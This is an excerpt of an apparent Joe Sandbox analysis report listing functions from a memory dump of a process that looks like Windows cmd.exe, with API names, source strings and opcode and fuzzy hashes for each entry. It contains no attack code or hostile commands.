                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5c0fd1969c73b4d39aa4be34888137298cba3c6158d7376fdb3c4dea73e1fa2a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6031D122A0875286E724AF19AC2407FF661FF45BA4FD59235DA5A433D0EF7DE84A8310
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBCA40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d98343f8a50b510becc2b8cc51fbdae8f634d85e983456aeaa23f385d89a4afb
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3911C621B0874681EB50EB55AD642BB9290BF84FE4FA85331DE6E4B3D5DF2CD0814320
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBBE00 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: 2$COMSPEC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e81633c5c4db6ea7cfa6e4a12e7214ba1c518983bb75d6b0f66f55e4efe1fd6e
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D51C021A0874A85FB70BB25AC3037FA291BF44B84FD86271DA4D462E5DF3CE84087A1
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC2EFC Relevance: 4.6, APIs: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4254246844-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: cf17374396e63ede5004fa905e84dade694dcee29536d7e8384d2144511f5058
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 957b6616a90fc8dff72bb369af8d616d7be4d88c64500895f40bc219e0b26270
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C541B622A0874286EE10AB00EC6537BE7A0FF95BA4FD58530DE5E47785EF3CE5428720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC498C Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2643372051-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2261ed067c1bd9d64c9916e02fbda67ef49cb5a19a04fca512b47334c3e2809f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49892fdbdbb93a03844bd16286cde042899f8d20c3c19ceaef7f6d70d853aae3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3F08672A19B46C6EB10AB65FD24076EAE1FF9D7A0BD59274C92E433D0DF3C94458210
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5A68 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1591002910-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d9a2411661cc749df2cc8e2c9a942563fecc7e1ab22d7c9986d6bd2ce2846776
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01F07439A09746CBE604AB10EC650BABBA0FF8A715FC5D175C90E47324DF3DA4058B60
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC291C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: DriveType
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 338552980-336475711
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0229af3b55ddfa6c7d46076c83f391ef179af98164e2293fd611dac5491c73d4
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EFE0656661874186D720DB60E86106BF761FF8D358FC41525D98D87724DB3CD149CB18
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC5AD8 Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF706EC5B52
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4297
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC42D7
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC42FD
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: memset.MSVCRT ref: 00007FF706EC4368
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF706EC4380
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: wcsrchr.MSVCRT ref: 00007FF706EC43E6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EC4224: lstrcmpW.KERNELBASE ref: 00007FF706EC4401
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF706EC5BC7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 497088868-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7240a597e42ac0a3fff55f65867979d698f0b616acacebf19362c77b89168f3a
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32318E20A0C74282EA24BB11ACA15BFE291BF89B90FD45531E94E87B95DF3CE5028720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC9A6C Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1412018758-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c3506a1d8debd3bbd36834f8c7fedff0ccd37dc3184a433ea20917ae1affb06f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7E09201F0930B81FE183B626C7507A92547F58B60FD81430CD1D06383EF2CA1928730
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EBCD90 Relevance: 2.5, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 063b3e903279888d6d7b745234a001a688b7cd7982b54247d6f368017d330862
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8F01936A18B42C6EA14AB15FC6007AFBA0FF99B40BD99535D94E03358DF3CA442C620
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC4C1C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: exit
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2483651598-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 90430df3a5be4bcf1ba3c50f497a30f48f6922419e394205c44485a56069c279
